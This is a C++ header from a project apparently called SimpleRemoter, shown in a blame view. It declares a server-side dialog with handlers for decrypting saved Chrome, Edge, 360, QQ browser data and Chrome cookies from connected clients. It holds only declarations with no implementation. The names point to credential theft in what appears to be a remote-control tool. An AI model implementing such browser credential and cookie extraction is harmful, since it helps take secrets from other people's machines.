Files
SimpleRemoter/server/2015Remote/DecryptDlg.h

35 lines
851 B
C
Raw Normal View History

#pragma once
2025-06-09 14:25:37 +08:00
#include "IOCPServer.h"
#include "Resource.h"
class DecryptDlg : public CDialogBase
{
DECLARE_DYNAMIC(DecryptDlg)
2025-06-09 14:25:37 +08:00
public:
DecryptDlg(CWnd* pParent = NULL, Server* IOCPServer = NULL, CONTEXT_OBJECT* ContextObject = NULL);
virtual ~DecryptDlg();
2025-06-09 14:25:37 +08:00
VOID OnReceiveComplete();
2025-06-09 14:25:37 +08:00
// 对话框数据
enum { IDD = IDD_DIALOG_DECRYPT };
2025-06-09 14:25:37 +08:00
protected:
virtual void DoDataExchange(CDataExchange* pDX); // DDX/DDV 支持
2025-06-09 14:25:37 +08:00
DECLARE_MESSAGE_MAP()
2025-06-09 14:25:37 +08:00
public:
virtual BOOL OnInitDialog();
afx_msg void OnClose();
afx_msg void OnSize(UINT nType, int cx, int cy);
afx_msg void OnDecryptChrome();
afx_msg void OnDecryptEdge();
afx_msg void OnDecryptSpeed360();
afx_msg void OnDecrypt360();
afx_msg void OnDecryptQQ();
afx_msg void OnDecryptChromeCookies();
CEdit m_EditDecrypedResult;
2025-06-09 14:25:37 +08:00
};